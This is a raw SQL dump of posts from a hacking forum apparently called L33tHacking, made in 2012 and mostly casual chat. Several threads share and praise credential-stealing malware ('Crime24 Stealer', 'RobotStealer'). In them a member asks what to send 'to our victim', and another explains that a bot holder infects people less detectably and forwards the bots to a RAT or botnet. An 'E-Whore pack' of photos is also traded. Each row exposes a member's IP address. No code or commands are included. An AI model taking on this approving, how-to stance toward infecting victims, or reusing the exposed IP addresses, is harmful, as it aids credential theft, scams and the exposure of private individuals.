'1348968957', '[quote=\'Timmy\' pid=\'2879\' dateline=\'1348968881\'] [quote=\'NeonLights\' pid=\'2876\' dateline=\'1348968456\'] [quote=\'Timmy\' pid=\'2783\' dateline=\'1348891350\'] Welcome to l33thacking and oh hell yeah my son got some pussy. [/quote] what do you mean by: my son got some pussy. ? and btw nice avatar :P [/quote] Thanks and you got a GF so you obviously gonna fuck her. [/quote] OOOOOO lol ok i see what u meen :P', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'da31159755ae0b223f822b1bcb6aff1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2881', '559', '2781', '3', 'RE: Upgrade Price Lowered', '0', '5', 'Timmy', '1348968969', 'Thats a good update and good luck with sales', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5235fd5e0a99040598b723909381f83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2882', '518', '2874', '7', 'RE: 2,500 Total Forum Posts', '0', '5', 'Timmy', '1348969030', '[quote=\'iTzIpod\' pid=\'2874\' dateline=\'1348966520\'] We can get that in a couple of days. Probably tomorrow, Monday, or Tuesday. Guaranteed. [/quote] Oh hell no, keep it clean bro. I will help too but lets make LH look more HQ instead of LQ spammed posts. Don\'t take me wrong.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'abda9f215ecca644660a90a713923a70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2883', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '5', 'Timmy', '1348969114', 'Thanks for the download and instructions. I love stealers thanks a bunch.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '52b1fbbbae4f9dae5ea154358ca0d20e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2884', '589', '2883', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1348969183', '[quote=\'Timmy\' pid=\'2883\' dateline=\'1348969114\'] Thanks for the download and instructions. I love stealers thanks a bunch. [/quote] Glad to hear :) ur welcome btw', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '191f33baf027f02298615726422359f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2885', '591', '2863', '21', 'RE: Amicitia Bot Holder', '0', '5', 'Timmy', '1348969214', 'What is this i still dont get it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7c1851c62944810e6d95bae41e5dd0c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2886', '597', '0', '3', '[Announcement]500 error solution', '0', '5', 'Timmy', '1348969292', 'I have noticed that I received 500 internal server error twice. Just to let everyone know that it\'s nothing to worry about just refresh the page and I sent jok3r a PM about it. Nothing serious about this error.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3cab02b2262b4bf0fa352c3c33794cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2887', '591', '2885', '21', 'RE: Amicitia Bot Holder', '0', '203', 'NeonLights', '1348969350', '[quote=\'Timmy\' pid=\'2885\' dateline=\'1348969214\'] What is this i still dont get it. [/quote] its a type of botnet but in this case its used to keep ur bots in some sort of cage... example: when u put a dog in a cage he cant leave... this is what u use this for... u infect ppl using this, because its alot less detactable... and then u just send the bots to ur rat or botnet', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a5195a64de2d0f192134f399c68b5cee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2888', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '5', 'Timmy', '1348969371', 'Spacefish, you do go inactive for a long time sometimes but whenever you create a thread its always HQ.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '481781663f74483069b22a293b318fe8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2889', '591', '2863', '21', 'RE: Amicitia Bot Holder', '0', '5', 'Timmy', '1348969551', 'Oh shit, thats awesome i will check it out', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '74d98eb5cdc9b4af4529a1d9feacd1c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2890', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '5', 'Timmy', '1348969675', 'No problem. You did a great work on this thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '167a77b5164b3d41b0d73d391c7da535', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2891', '589', '2890', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1348969836', '[quote=\'Timmy\' pid=\'2890\' dateline=\'1348969675\'] No problem. You did a great work on this thread. [/quote] thx i spend a lot of time to make these threads for u guys :)', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'bcf749ec3804ab483913a273101dd909', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2892', '583', '2844', '17', 'RE: 500+ pictures of same girl E-Whore pack', '0', '5', 'Timmy', '1348969884', 'She\'s OD hot son, thanks for this and img tags aren\'t allowed here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ffb87f62425002b7c567de866a4209f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2893', '591', '2889', '21', 'RE: Amicitia Bot Holder', '0', '203', 'NeonLights', '1348969911', '[quote=\'Timmy\' pid=\'2889\' dateline=\'1348969551\'] Oh shit, thats awesome i will check it out [/quote] OMG, just tried using it and it doesn receive connections... il leave the download for a lil while to see if ppl have the same problem... i think its unstable now :(', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '33b4cb472937a29ad55cb89373288b59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2894', '582', '2835', '15', 'RE: RobotStealer Free Stealer', '0', '5', 'Timmy', '1348969954', 'So what do we send to our victim?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c4493a8c371ea54b41a9c9923c1959df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2895', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '5', 'Timmy', '1348970013', 'I watch prison break or play PS3.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '70b3519304b783e89591bf3b5304c5e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2896', '582', '2835', '15', 'RE: RobotStealer Free Stealer', '0', '203', 'NeonLights', '1348970063', 'good question... i havent personally used this program yet, but u should be able to figure it out :P look for a tutorial somewhere ... but i think it works like a jdb and u jsut upload to a site idk tho', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a9fb7cebe0734f329802181ad48394b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2897', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '5', 'Timmy', '1348970122', 'I use AVG free edition because it\'s a famous antivirus.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9cebffe6545981c5766a576effdc1727', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2898', '562', '2791', '7', 'RE: World\'s Longest Email Address', '0', '5', 'Timmy', '1348970181', 'Lol nice site I will give it a try but does it really function has an email?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '06e56c8b8145ccacab5da79c5f9e73ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2899', '560', '2788', '24', 'RE: Windows 7 Official direct downloads', '0', '5', 'Timmy', '1348970224', 'Thanks a bunch, but text is all messed up on the page.', '72.231.24.165', '1223104677', '1', '0', '5', '1348970264', '1', '5d8b239a521d25d1b8d18343712916cc', '0', '1348970264'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2900', '597', '2886', '3', 'RE: [Announcement]500 error solution', '0', '82', 'iTzIpod', '1348970394', 'I already told t3h jok3r about this on Skype. Although I\'m pretty sure it\'s just the hosting.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e296f12f800b9ac13368b070f5ce7773', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2901', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348970436', 'I wasn\'t trying to say that we should all spam LQ posts... I was saying that we can achieve that in a couple days.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9f0d2ecea4fb2c5ac556b1ce02ba179', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2902', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '7', 'Romdu62', '1348970474', 'I watched Ted. Im not a kid its just that its a funny movie', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '64b08641c428a690c1039e80d097a4fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2903', '587', '2854', '65', 'RE: Who likes the Rocky Films?', '0', '7', 'Romdu62', '1348970512', 'Never heard of rocky films before.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8adf6fa4d5f6174d065a22119ec7a847', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2904', '583', '2844', '17', 'RE: 500+ pictures of same girl E-Whore pack', '0', '82', 'iTzIpod', '1348970550', 'You\'re right. Although I don\'t know why. Or is it just disabled in this section I\'m guessing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14b1c900f1438ca92acaa82c19d8af92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2905', '592', '2865', '11', 'RE: Lifehacker: The Guide to Working Smarter, Faster, and Better', '0', '7', 'Romdu62', '1348970566', 'I swear to god I\'m gonna read this and make sure I complete this ebook.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1b8378b4e24272b751f271f374bb6f67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2906', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '82', 'iTzIpod', '1348970582', 'I love Prison Break. So does t3h jok3r :p Too bad the series ended :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1ef341bf9236efb41fa1766fd2fe6d03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2907', '597', '2886', '3', 'RE: [Announcement]500 error solution', '0', '7', 'Romdu62', '1348970616', 'This comes through the hosting when it\'s receiving too much data or being overloaded.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fddd0605faeb7ee1e54af0ec698f8ba3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2908', '598', '0', '42', 'Top 10 donors of 2012 US election', '0', '7', 'Romdu62', '1348970798', 'http://news.yahoo.com/photos/donors-list-slideshow/donors-list-photo-1348851129.html The link above shows pictures of the top 10 donors of 2012 US president election. Speaking of elections, who are you voting for?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7738c79004dcf3c96ebbe868f8a96b06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2909', '599', '0', '7', 'Someone refer the 200th Member', '0', '82', 'iTzIpod', '1348970816', 'L33tHacking currently has 199 Members. Whoever refers the 200th member, will receive a spot in Unique! (You can get kicked though if you are inactive, or leech, or post LQ, etc.)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f5383b6e8c0423fd0743e0754088e178', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2910', '558', '2769', '33', 'RE: Guess this font?', '0', '7', 'Romdu62', '1348970837', 'that\'s a good idea, asking dafont is the best thing to do.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '72aed2e6c937cff611f531273f624b30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2911', '558', '2769', '33', 'RE: Guess this font?', '0', '82', 'iTzIpod', '1348971058', 'I sent them the font already. They are going to try to reply as soon as possible! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'deb3c62e968a1859ff665aa581ef2e45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2912', '600', '0', '58', 'OMG HERE IT COMES!', '0', '1', 't3h jok3r', '1348971372', 'The long awaited usergroup finally gets added to the L33THacking community. Which group am I talking about? [spoiler] [font=Tahoma][color=#32CD32][b][align=center][size=xx-large][u]Gamers[/u][/size][/align][/b][/color][/font] [b]Userbar:[/b] [img]http://l33thacking.net/images/ub/gamer.png[/img] [b]Group Description:[/b] We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here! [b]Forum Icon:[/b] [img]http://l33thacking.net/uploads/ficons/gamer.png[/img] [i][b]Group Leader:[/b][/i] [url=http://l33thacking.net/user-61.html]NXK[/url] Now the main question that many members have. [u]When will the gamers section be added?[/u] It will be up under a week or so. Enjoy! [/spoiler]', '72.231.24.165', '1223104677', '1', '0', '1', '1349038110', '1', '446720db02336ab2bddf2534ce8181ff', '0', '1349038110'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2913', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '1', 't3h jok3r', '1348972285', 'We already have 200+ members. Proof: http://l33thacking.net/user-207.html We merged some users so we don\'t officially have 200.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a8283181d82697ddd7996ffc945eb1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2914', '601', '0', '3', 'Major Announcement by Jok3r!', '0', '1', 't3h jok3r', '1348972975', 'I\'m glad to announce that ?????? is coming back to L33THacking. For those who don\'t know who ?????? is, he was one of the first admins on LH. He left due to school and he got banned over a huge misunderstanding. He will be a Staff member now. Link: http://l33thacking.net/user-3.html He changed his username, he is now unknown has ??????????¢™', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c61623141c26839d910a92d8314c944b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2915', '602', '0', '63', '[Request] Sig and Avatar', '0', '3', '??????????¢™', '1348973049', '[b]Hey guys I am back I was known as ?????? but now I am. If someone could make me a sig and avatar that says ??????????¢™ I would really appreciate. Doesnt matter about the colors I just want it to look nice. I have no money atm so I would appreciate it if you could do it for free, Thanks.[/b]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '20caca311a1e33ae84d85793be2e2e7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2916', '592', '2905', '11', 'RE: Lifehacker: The Guide to Working Smarter, Faster, and Better', '0', '203', 'NeonLights', '1348973167', '[quote=\'Romdu62\' pid=\'2905\' dateline=\'1348970566\'] I swear to god I\'m gonna read this and make sure I complete this ebook. [/quote] LOL... id love to see you read the entire thing and actually complete it hahahha', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e865e817b055442e945b39d631470152', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2917', '600', '2912', '58', 'RE: OMG HERE IT COMES!', '0', '82', 'iTzIpod', '1348973515', 'Hey!! That\'s my ugly userbar! :D Congratulations NXK on owning your own usergroup!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c5f81c0e966ede89aa88e665c258ebda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2918', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '82', 'iTzIpod', '1348973566', 'Welcome back Reborn. I don\'t know how to pronounce your new name so. I\'m sorry. I know you don\'t know me. But I\'m iTzIpod. You can call me Jacob.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1ef2a728d1452a0309cc1a3656debcc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2919', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '82', 'iTzIpod', '1348973616', 'Welcome back. Also, do you want it to be animated or just a regular signature (.png) Just saying your name only correct?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30b06f2069b98eaaaa90c0d74c428e2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2920', '331', '1545', '5', 'RE: New Rules and Instructions v.4', '0', '3', '??????????¢™', '1348973651', 'This is some great updates. I am glad to be back.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '26915643e9fcaebef9e380b7e704e0bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2921', '327', '1532', '5', 'RE: Staff Notice in threads', '0', '3', '??????????¢™', '1348973915', 'Sounds good, I will be the best staff member here AGAIN.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'e2cb29d762a8fcbcb75520154bb5d05b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2922', '603', '0', '47', 'Custom Pastebin Source Code', '0', '3', '??????????¢™', '1348973990', '[b]Hello guys, I am giving away a pastebin like source code, There is a link of it below. Just post below and I will PM you the source. Preview Link: http://www.pastebintest.ulmb.com [/b]', '75.35.239.228', '1260646372', '1', '0', '3', '1348976137', '1', 'cad2e999ce29e62e7d029144e0be13a2', '0', '1348976137'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2923', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1348974082', 'I would love it to be animated and yes just my name. Thanks man, +rep for doing it IF you do it.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '7abf2953ace9015643f7142410c67db7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2924', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1348974322', 'Thanks for the announcement. I am glad to be back and I will become one of the best staff members ever AGAIN.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '7e78ce0d14baa0daa5a8d627851051b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2925', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '3', '??????????¢™', '1348974673', 'I voted for LH. Hopefully we can reach the top', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '4e53869bdcd693183bbaabf261aeca4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2926', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '3', '??????????¢™', '1348974888', 'I am glad that everyone likes them. I havent made any lately but I will try to make more soon', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '788dab94dadc3182ea3166d3357c05d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2927', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '82', 'iTzIpod', '1348974953', 'I would love to try, but I can\'t. 1. I\'m not good with fonts. 2. I don\'t know how to work on animated signatures. 3. I recommend asking Reloadzor then.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4bce0089d02017aea9b310116edc1c48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2928', '604', '0', '61', 'Unique Sig and Header', '0', '3', '??????????¢™', '1348975430', '[b]Hello guys I am here to give you guys the Signature and Header of my old group that I had on HF. Hopefully you guys like them. Sorry the backgrounds are not transparent.[/b] [b][align=center][size=large][color=#FFD700]Signature[/color][/size][/align][/b] [align=center][img]http://i.imgur.com/0AsQd.gif[/img][/align] 